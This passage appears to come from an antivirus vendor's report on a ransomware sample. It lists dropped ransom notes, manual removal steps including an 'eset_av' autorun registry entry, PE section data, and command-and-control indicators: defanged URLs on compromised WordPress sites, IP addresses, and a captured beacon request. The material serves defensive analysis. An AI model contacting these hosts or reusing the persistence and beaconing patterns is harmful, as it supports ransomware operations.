    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\20\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\37\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\26\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Documents\My Music\Sample Playlists\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Documents\My Pictures\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\9.0\Updater\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Local Settings\History\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\63\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\25\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Templates\quattro.wb2 (430 bytes)
    %Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@www.bing[1].txt (1280 bytes)
    %Documents and Settings%\%current user%\My Documents\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\51\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\13\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\12\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\36\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\16\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Protect\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\5\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\43\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\jre1.6.0_18\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\can\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\46\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\22\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\UserData\2Z89WTQV\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\24\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Local Settings\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\howto_recover_files_xnidj.txt (2 bytes)
    C:\totalcmd\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Templates\excel4.xls (419 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\13\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\58\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@c.ca.msn[1].txt (988 bytes)
    %Documents and Settings%\%current user%\My Documents\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Cookies\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\26\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Documents\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\Accessories\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\NetHood\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\18\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\11\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\Microsoft\Windows\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\Accessories\Entertainment\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Linguistics\Dictionaries\Adobe Custom Dictionary\brt\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\VMware\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\PrintHood\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\32\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\15\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Startup\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\21\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\54\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Templates\wordpfct.wpd (892 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\47\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Accessibility\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\14\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\s.ytimg.com\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\31\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\30\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@kaspersky[1].txt (1318 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Accessories\Entertainment\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\39\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\Templates\quattro.wb2 (430 bytes)
    %Documents and Settings%\All Users\Documents\My Videos\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\11\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\28\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Templates\winword2.doc (419 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\32\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\s.ytimg.com\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\18\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@hit.gemius[2].txt (1116 bytes)
    %Documents and Settings%\%current user%\Application Data\Macromedia\Flash Player\#SharedObjects\QEA5Z3QJ\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Start Menu\Programs\Accessories\Accessibility\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\SystemCertificates\My\Certificates\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\Certificates\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\VMware\VMware Tools\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\6\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\34\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\21\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\GHISLER\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Favorites\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\27\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@doubleclick[1].txt (1116 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\36\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\My Documents\My Music\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\21\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\53\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Templates\wordpfct.wpd (892 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\30\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\46\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\52\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\AssetCache\E7VJ4HGS\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@microsoft[1].txt (1052 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\Content.IE5\S96BCDQ7\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\30\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@adnxs[2].txt (1600 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\34\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\43\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\31\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\Default User\NetHood\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\muffin\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\My Documents\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Internet Explorer\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Temporary Internet Files\Content.IE5\CHEZ8TER\howto_recover_files_xnidj.txt (2 bytes)
    %System%\config\SOFTWARE.LOG (5702 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\History\History.IE5\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Music\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\8\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\1\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Entertainment\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\Certificates\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\MMC\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Templates\winword.doc (426 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@c.msn[1].txt (988 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Startup\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\UserData\YJM90VAL\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\61\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\LocalService\Application Data\Microsoft\SystemCertificates\My\Certificates\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Protect\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@msn[2].txt (1478 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Temporary Internet Files\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\34\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\23\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Documents\My Videos\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@abmr[2].txt (1084 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\Default User\Local Settings\Application Data\Microsoft\Windows Media\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\55\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Adobe\Acrobat\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\SystemCertificates\My\CRLs\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\38\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Application Data\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\Wireshark\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\52\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@kaspersky.122.2o7[2].txt (1084 bytes)
    %Documents and Settings%\NetworkService\Application Data\Microsoft\Credentials\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Crypto\RSA\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\56\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\All Users\Start Menu\Programs\WinPcap\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Accessories\Entertainment\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\58\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\35\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Adobe\Flash Player\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\PrintHood\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\4\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\29\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\42\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\All Users\Documents\My Pictures\Sample Pictures\Blue hills.jpg (502 bytes)
    %Documents and Settings%\%current user%\Local Settings\Application Data\Microsoft\Credentials\S-1-5-21-1844237615-1960408961-1801674531-1003\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Cookies\Current_User@bing[2].txt (1318 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\42\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Application Data\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\NetworkService\Local Settings\Application Data\Microsoft\howto_recover_files_xnidj.txt (2 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\SystemCache\6.0\37\howto_recover_files_xnidj.html (6 bytes)
    %Documents and Settings%\%current user%\Application Data\Sun\Java\Deployment\cache\6.0\48\howto_recover_files_xnidj.html (6 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "eset_av" = "%Documents and Settings%\%current user%\Application Data\vcwrms.exe"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "eset_av" = "C"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: Language Neutral

Company Name: Product Name: Product Version: Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: File Description: Comments: Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text40961144141146884.28016c30911b2c2b7b20ec95d03d3c76bad0
.rdata11878419052204803.835088096d6c910c1562c1a48a888d771719d
.data139264222181240961.66594980dcd6e7ced4bd8b8f993270d61c160
.rsrc236339227216286723.4352157d3fdaf9ec00fe40028dacc5db1dbf8

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Network Activity

URLs

URL IP
hxxp://bostonhygiene.com/wp-content/plugins/quick-setup/misc.php?1A6F2F8D95EAE2533634E025906C5028D237F1B54EC69E25FD1FDF3C098E9A435C24AB2282AE252530C48C1BD89C293EFCB39E90E3491BD3466F539B316948B803BA57BDEC99CE90BF76FE045BFBE1F845D5A9FAF3CCD954D0261661E41A4134617B69DA317FD9D6CD52901D0FBBBCB3EACFAB1C7339B664B2B4C15C5C63178FBBE21EA108F7E6EE757E35F94FB0BCA38CAFDAB1159E778662F88FCD286D556CAA93E0833CDA0F234B37B9A0D00455AF10AD7F5FB69BA4A1F443B53C321341F4571731389F344E9913E924A401BB0B1D89E6A941807F5ED012C4DAFFB91B3DEB6234D2C5FD3AC35F7749F013386E1320C66822505065C14CF9072FE9749EA91EF795F5633B7ACD056CBF2B0B085F85B40ED4B47F58D45615D3B14329AB8082E4922F221846BEB883446EE1AFBF9EFA07FA11C0EA9F437D1AD55D7CDF8216FD162059DD06A024A655E2185F2B6D111A73B0C22247361FCABC1D295C826DF0F453204.11.56.48
hxxp://majowy.info/wp-content/plugins/wp-handy-lightbox/misc.php?1A6F2F8D95EAE2533634E025906C5028D237F1B54EC69E25FD1FDF3C098E9A435C24AB2282AE252530C48C1BD89C293EFCB39E90E3491BD3466F539B316948B803BA57BDEC99CE90BF76FE045BFBE1F845D5A9FAF3CCD954D0261661E41A4134617B69DA317FD9D6CD52901D0FBBBCB3EACFAB1C7339B664B2B4C15C5C63178FBBE21EA108F7E6EE757E35F94FB0BCA38CAFDAB1159E778662F88FCD286D556CAA93E0833CDA0F234B37B9A0D00455AF10AD7F5FB69BA4A1F443B53C321341F4571731389F344E9913E924A401BB0B1D89E6A941807F5ED012C4DAFFB91B3DEB6234D2C5FD3AC35F7749F013386E1320C66822505065C14CF9072FE9749EA91EF795F5633B7ACD056CBF2B0B085F85B40ED4B47F58D45615D3B14329AB8082E4BD36E47004EDFDD34308C01B8FEAEC4D5AD28C8D8561693F231BA5035DA4348A94E59551129949902AF95641E935018A484346433AA1DD4D4F3D9019FC0B6B7C79.96.20.98
hxxp://prettybaked.pl/wp-content/plugins/share-buttons-wp/misc.php?1A6F2F8D95EAE2533634E025906C5028D237F1B54EC69E25FD1FDF3C098E9A435C24AB2282AE252530C48C1BD89C293EFCB39E90E3491BD3466F539B316948B803BA57BDEC99CE90BF76FE045BFBE1F845D5A9FAF3CCD954D0261661E41A4134617B69DA317FD9D6CD52901D0FBBBCB3EACFAB1C7339B664B2B4C15C5C63178FBBE21EA108F7E6EE757E35F94FB0BCA38CAFDAB1159E778662F88FCD286D556CAA93E0833CDA0F234B37B9A0D00455AF10AD7F5FB69BA4A1F443B53C321341F4571731389F344E9913E924A401BB0B1D89E6A941807F5ED012C4DAFFB91B3DEB6234D2C5FD3AC35F7749F013386E1320C66822505065C14CF9072FE9749EA91EF795F5633B7ACD056CBF2B0B085F85B40ED4B47F58D45615D3B14329AB8082E47A0936EA2859AB0894FA542D6FB1C9DEDF0C582FDFF63D6B9ABB619FD7B1334F65A1FB1B246302127467D3135D47BD849B346DD6E6AFC12BCC8DC0DD37C7EBA8185.23.21.169
hxxp://elifeline.us/wp-content/plugins/custom-permalinks/misc.php?1A6F2F8D95EAE2533634E025906C5028D237F1B54EC69E25FD1FDF3C098E9A435C24AB2282AE252530C48C1BD89C293EFCB39E90E3491BD3466F539B316948B803BA57BDEC99CE90BF76FE045BFBE1F845D5A9FAF3CCD954D0261661E41A4134617B69DA317FD9D6CD52901D0FBBBCB3EACFAB1C7339B664B2B4C15C5C63178FBBE21EA108F7E6EE757E35F94FB0BCA38CAFDAB1159E778662F88FCD286D556CAA93E0833CDA0F234B37B9A0D00455AF10AD7F5FB69BA4A1F443B53C321341F4571731389F344E9913E924A401BB0B1D89E6A941807F5ED012C4DAFFB91B3DEB6234D2C5FD3AC35F7749F013386E1320C66822505065C14CF9072FE9749EA91EF795F5633B7ACD056CBF2B0B085F85B40ED4B47F58D45615D3B14329AB8082E4EAAA132FAF9652709D7DB7D7F2E302407033143EF625EE6F7F89DB4A564D6876C2B21DBB39FD7F2C5953D4CC81FE6A21180726B1DF5A76160FC9BF513B69531075.148.33.201

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /wp-content/plugins/quick-setup/misc.php?1A6F2F8D95EAE2533634E025906C5028D237F1B54EC69E25FD1FDF3C098E9A435C24AB2282AE252530C48C1BD89C293EFCB39E90E3491BD3466F539B316948B803BA57BDEC99CE90BF76FE045BFBE1F845D5A9FAF3CCD954D0261661E41A4134617B69DA317FD9D6CD52901D0FBBBCB3EACFAB1C7339B664B2B4C15C5C63178FBBE21EA108F7E6EE757E35F94FB0BCA38CAFDAB1159E778662F88FCD286D556CAA93E0833CDA0F234B37B9A0D00455AF10AD7F5FB69BA4A1F443B53C321341F4571731389F344E9913E924A401BB0B1D89E6A941807F5ED012C4DAFFB91B3DEB6234D2C5FD3AC35F7749F013386E1320C66822505065C14CF9072FE9749EA91EF795F5633B7ACD056CBF2B0B085F85B40ED4B47F58D45615D3B14329AB8082E4922F221846BEB883446EE1AFBF9EFA07FA11C0EA9F437D1AD55D7CDF8216FD162059DD06A024A655E2185F2B6D111A73B0C22247361FCABC1D295C826DF0F453 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0

Host: bostonhygiene.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Tue, 17 May 2016 07:51:50 GMT

Server: Apache

Set-Cookie: vsid=906vr2110171104829104; expires=Sun, 16-May-2021 07:51:50 GMT; path=/; domain=bostonhygiene.com; httponly

Expires: Mon, 22 Jul 2002 11:12:01 GMT

Cache-Control: private, no-cache

Pragma: no-cache

Vary: Accept-Encoding,User-Agent

Content-Length: 802

Keep-Alive: timeout=5, max=105

Connection: Keep-Alive

Content-Type: text/html; charset=UTF-8

